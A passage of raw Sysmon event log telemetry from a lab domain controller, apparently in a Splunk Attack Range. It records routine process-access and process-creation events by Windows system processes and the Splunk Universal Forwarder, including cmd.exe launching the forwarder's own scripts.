32\ntdll.dll+51791 10341000x80000000000000002233Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:21.144{D28789B6-7C62-5FA1-0500-000000008801}644660C:\Windows\system32\csrss.exe{D28789B6-7C79-5FA1-6700-000000008801}4048C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002232Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:21.144{D28789B6-7C73-5FA1-3300-000000008801}26763952C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{D28789B6-7C79-5FA1-6700-000000008801}4048C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7d35e7|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7cdcb9|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca4ec|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca0a3|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7c9f0d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6d7908|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6de2ee|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b29fa|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b4274|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e42dc|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ec682|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e9959|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7f31|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002231Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:21.146{D28789B6-7C79-5FA1-6700-000000008801}4048C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\powershell.cmd" --scheme"C:\Windows\system32\NT AUTHORITY\SYSTEM{D28789B6-7C62-5FA1-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{D28789B6-7C73-5FA1-3300-000000008801}2676C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000002230Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:21.034{D28789B6-7C74-5FA1-3F00-000000008801}39563976C:\Windows\system32\conhost.exe{D28789B6-7C79-5FA1-6600-000000008801}872C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002229Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:21.034{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002228Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:21.034{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002227Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:21.034{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002226Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:21.034{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002225Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:21.034{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002224Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:21.034{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002223Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:21.034{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002222Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:21.034{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002221Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:21.034{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002220Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:21.034{D28789B6-7C62-5FA1-0500-000000008801}644804C:\Windows\system32\csrss.exe{D28789B6-7C79-5FA1-6600-000000008801}872C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002219Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:21.034{D28789B6-7C73-5FA1-3300-000000008801}26763952C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{D28789B6-7C79-5FA1-6600-000000008801}872C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7d35e7|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7cdcb9|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca4ec|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7ca0a3|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+7c9f0d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6d7908|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6de2ee|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b29fa|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+6b4274|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e42dc|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ec682|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e9959|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7f31|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002218Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:21.037{D28789B6-7C79-5FA1-6600-000000008801}872C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c ""C:\Program Files\SplunkUniversalForwarder\etc\system\bin\perfmon.cmd" --scheme"C:\Windows\system32\NT AUTHORITY\SYSTEM{D28789B6-7C62-5FA1-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{D28789B6-7C73-5FA1-3300-000000008801}2676C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000002270Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:22.394{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C7A-5FA1-6900-000000008801}4124C:\Program Files\SplunkUniversalForwarder\bin\splunk-wmi.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+2e43b|C:\Windows\System32\RPCRT4.dll+6213a|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002269Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:22.378{D28789B6-7C74-5FA1-3F00-000000008801}39563976C:\Windows\system32\conhost.exe{D28789B6-7C7A-5FA1-6900-000000008801}4124C:\Program Files\SplunkUniversalForwarder\bin\splunk-wmi.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002268Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:22.378{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002267Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:22.378{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002266Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:22.378{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002265Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:22.378{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002264Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:22.378{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002263Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:22.378{D28789B6-7C62-5FA1-0500-000000008801}6442432C:\Windows\system32\csrss.exe{D28789B6-7C7A-5FA1-6900-000000008801}4124C:\Program Files\SplunkUniversalForwarder\bin\splunk-wmi.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002262Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:22.378{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002261Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:22.378{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002260Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:22.378{D28789B6-7C73-5FA1-3300-000000008801}26763928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{D28789B6-7C7A-5FA1-6900-000000008801}4124C:\Program Files\SplunkUniversalForwarder\bin\splunk-wmi.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program 